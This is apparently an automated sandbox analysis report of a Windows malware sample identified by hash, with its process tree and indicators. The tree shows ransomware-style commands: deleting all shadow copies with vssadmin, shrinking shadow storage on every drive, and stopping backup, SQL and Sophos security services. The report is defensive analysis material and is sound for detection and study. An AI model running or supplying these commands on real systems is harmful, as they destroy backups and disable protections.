Token: SeSecurityPrivilege	2936	wevtutil.exe
Token: SeBackupPrivilege	2936	wevtutil.exe
Token: SeSecurityPrivilege	2368	wevtutil.exe
Token: SeBackupPrivilege	2368	wevtutil.exe
Token: SeSecurityPrivilege	1940	wevtutil.exe
Token: SeBackupPrivilege	1940	wevtutil.exe
Token: SeSecurityPrivilege	2420	wevtutil.exe
Token: SeBackupPrivilege	2420	wevtutil.exe
Token: SeSecurityPrivilege	1896	wevtutil.exe
Token: SeBackupPrivilege	1896	wevtutil.exe
Token: SeSecurityPrivilege	2212	wevtutil.exe
Token: SeBackupPrivilege	2212	wevtutil.exe
Token: SeSecurityPrivilege	1616	wevtutil.exe
Token: SeBackupPrivilege	1616	wevtutil.exe
Token: SeSecurityPrivilege	1764	wevtutil.exe
Token: SeBackupPrivilege	1764	wevtutil.exe
Token: SeSecurityPrivilege	2244	wevtutil.exe
Token: SeBackupPrivilege	2244	wevtutil.exe
Token: SeSecurityPrivilege	1144	wevtutil.exe
Token: SeBackupPrivilege	1144	wevtutil.exe
Token: SeSecurityPrivilege	1500	wevtutil.exe
Token: SeBackupPrivilege	1500	wevtutil.exe
Token: SeSecurityPrivilege	1952	wevtutil.exe
Token: SeBackupPrivilege	1952	wevtutil.exe
Token: SeSecurityPrivilege	308	wevtutil.exe
Token: SeBackupPrivilege	308	wevtutil.exe
Token: SeSecurityPrivilege	3148	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1624 wrote to memory of 1896	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	28
PID 1624 wrote to memory of 1896	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	28
PID 1624 wrote to memory of 1896	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	28
PID 1624 wrote to memory of 520	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	29
PID 1624 wrote to memory of 520	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	29
PID 1624 wrote to memory of 520	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	29
PID 1624 wrote to memory of 672	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	30
PID 1624 wrote to memory of 672	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	30
PID 1624 wrote to memory of 672	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	30
PID 672 wrote to memory of 468	672	cmd.exe	31
PID 672 wrote to memory of 468	672	cmd.exe	31
PID 672 wrote to memory of 468	672	cmd.exe	31
PID 1624 wrote to memory of 548	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	32
PID 1624 wrote to memory of 548	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	32
PID 1624 wrote to memory of 548	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	32
PID 1624 wrote to memory of 1328	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	34
PID 1624 wrote to memory of 1328	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	34
PID 1624 wrote to memory of 1328	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	34
PID 1624 wrote to memory of 1676	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	33
PID 1624 wrote to memory of 1676	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	33
PID 1624 wrote to memory of 1676	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	33
PID 1624 wrote to memory of 1472	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	35
PID 1624 wrote to memory of 1472	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	35
PID 1624 wrote to memory of 1472	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	35
PID 1624 wrote to memory of 896	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	52
PID 1624 wrote to memory of 896	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	52
PID 1624 wrote to memory of 896	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	52
PID 1624 wrote to memory of 2036	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	51
PID 1624 wrote to memory of 2036	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	51
PID 1624 wrote to memory of 2036	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	51
PID 1624 wrote to memory of 1596	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	50
PID 1624 wrote to memory of 1596	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	50
PID 1624 wrote to memory of 1596	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	50
PID 1624 wrote to memory of 1852	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	48
PID 1624 wrote to memory of 1852	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	48
PID 1624 wrote to memory of 1852	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	48
PID 1624 wrote to memory of 1648	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	49
PID 1624 wrote to memory of 1648	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	49
PID 1624 wrote to memory of 1648	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	49
PID 1624 wrote to memory of 1952	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	47
PID 1624 wrote to memory of 1952	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	47
PID 1624 wrote to memory of 1952	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	47
PID 1624 wrote to memory of 1484	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	46
PID 1624 wrote to memory of 1484	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	46
PID 1624 wrote to memory of 1484	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	46
PID 1624 wrote to memory of 1848	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	45
PID 1624 wrote to memory of 1848	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	45
PID 1624 wrote to memory of 1848	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	45
PID 1624 wrote to memory of 1740	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	44
PID 1624 wrote to memory of 1740	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	44
PID 1624 wrote to memory of 1740	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	44
PID 1624 wrote to memory of 1020	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	43
PID 1624 wrote to memory of 1020	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	43
PID 1624 wrote to memory of 1020	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	43
PID 548 wrote to memory of 1132	548	cmd.exe	40
PID 548 wrote to memory of 1132	548	cmd.exe	40
PID 548 wrote to memory of 1132	548	cmd.exe	40
PID 1624 wrote to memory of 1464	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	42
PID 1624 wrote to memory of 1464	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	42
PID 1624 wrote to memory of 1464	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	42
PID 1624 wrote to memory of 1016	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	41
PID 1624 wrote to memory of 1016	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	41
PID 1624 wrote to memory of 1016	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	41
PID 1624 wrote to memory of 1460	1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	39

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2324	Process not Found
228	attrib.exe
2552	attrib.exe
3020	Process not Found
1332	Process not Found
2336	Process not Found
2940	Process not Found
1068	Process not Found

C:\Users\Admin\AppData\Local\Temp\7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
"C:\Users\Admin\AppData\Local\Temp\7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe"
1⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
  2⤵
  PID:1896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c echo off
  2⤵
  PID:520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c chcp 437
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:672
- - C:\Windows\system32\chcp.com
    chcp 437
    3⤵
    PID:468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:548
- - C:\Windows\system32\net.exe
    net stop "Acronis VSS Provider"
    3⤵
    PID:1132
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Acronis VSS Provider"
      4⤵
      PID:1256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
  2⤵
  PID:1676
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
    3⤵
    PID:520
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
  2⤵
  PID:1328
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
    3⤵
    PID:592
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
  2⤵
  PID:1472
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    3⤵
    PID:988
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
  2⤵
  PID:1748
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
    3⤵
    PID:2128
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
  2⤵
  PID:1352
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
    3⤵
    PID:2264
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
  2⤵
  PID:1720
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
    3⤵
    PID:1556
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2188
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "MsDtsServer110"
    3⤵
    PID:2116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
  2⤵
  PID:1460
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
    3⤵
    PID:1796
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
  2⤵
  PID:1016
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
    3⤵
    PID:2152
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
  2⤵
  PID:1464
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
    3⤵
    PID:628
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
  2⤵
  PID:1020
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
    3⤵
    PID:2160
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
  2⤵
  PID:1740
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
    3⤵
    PID:1272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  2⤵
  PID:1848
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    3⤵
    PID:268
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
      4⤵
      Interacts with shadow copies
      PID:2312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
  2⤵
  PID:1484
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
    3⤵
    PID:2200
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
  2⤵
  PID:1952
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
    3⤵
    PID:1700
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
      4⤵
      Interacts with shadow copies
      PID:2244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
  2⤵
  PID:1852
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
    3⤵
    PID:1132
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
  2⤵
  PID:1648
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
    3⤵
    PID:1244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
  2⤵
  PID:1596
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
    3⤵
    PID:1736
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
  2⤵
  PID:2036
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
    3⤵
    PID:2176
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
  2⤵
  PID:896
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
    3⤵
    PID:756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
  2⤵
  PID:544
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
    3⤵
    PID:2116
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
  2⤵
  PID:1728
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
    3⤵
    PID:2052
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
  2⤵
  PID:1784
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
    3⤵
    PID:852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
  2⤵
  PID:1808
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
    3⤵
    PID:2068
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:1716
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
    3⤵
    PID:2060
  - - C:\Windows\system32\vssadmin.exe
      vssadmin Delete Shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:2448
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SYSTEM_BGC"
      4⤵
      PID:1716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"
    3⤵
    PID:3416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
  2⤵
  PID:1536
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
    3⤵
    PID:872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
  2⤵
  PID:1176
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
    3⤵
    PID:964
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
      4⤵
      Interacts with shadow copies
      PID:2212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
  2⤵
  PID:556
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
    3⤵
    PID:1764
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"
  2⤵
  PID:688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Agent"
  2⤵
  PID:2304
- - C:\Windows\system32\net.exe
    net stop "Sophos Agent"
    3⤵
    PID:2320
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Agent"
      4⤵
      PID:2332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"
  2⤵
  PID:2396
- - C:\Windows\system32\net.exe
    net stop "Sophos AutoUpdate Service"
    3⤵
    PID:2440
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos AutoUpdate Service"
      4⤵
      PID:2520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"
  2⤵
  PID:2680
- - C:\Windows\system32\net.exe
    net stop "Sophos Clean Service"
    3⤵
    PID:2688
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Clean Service"
      4⤵
      PID:2696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"
  2⤵
  PID:2708
- - C:\Windows\system32\net.exe
    net stop "Sophos Device Control Service"
    3⤵
    PID:2724
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Device Control Service"
      4⤵
      PID:2736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"
  2⤵
  PID:2772
- - C:\Windows\system32\net.exe
    net stop "Sophos File Scanner Service"
    3⤵
    PID:2788
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos File Scanner Service"
      4⤵
      PID:2824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"
  2⤵
  PID:2916
- - C:\Windows\system32\net.exe
    net stop "Sophos Health Service"
    3⤵
    PID:2952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"
  2⤵
  PID:3060
- - C:\Windows\system32\net.exe
    net stop "Sophos MCS Agent"
    3⤵
    PID:1584
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos MCS Agent"
      4⤵
      PID:1696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"
  2⤵
  PID:2088
- - C:\Windows\system32\net.exe
    net stop "Sophos MCS Client"
    3⤵
    PID:2076
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos MCS Client"
      4⤵
      PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"
  2⤵
  PID:2776
- - C:\Windows\system32\net.exe
    net stop "Sophos Message Router"
    3⤵
    PID:1696
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Message Router"
      4⤵
      PID:1584
- C:\Windows\system32\cmd.exe
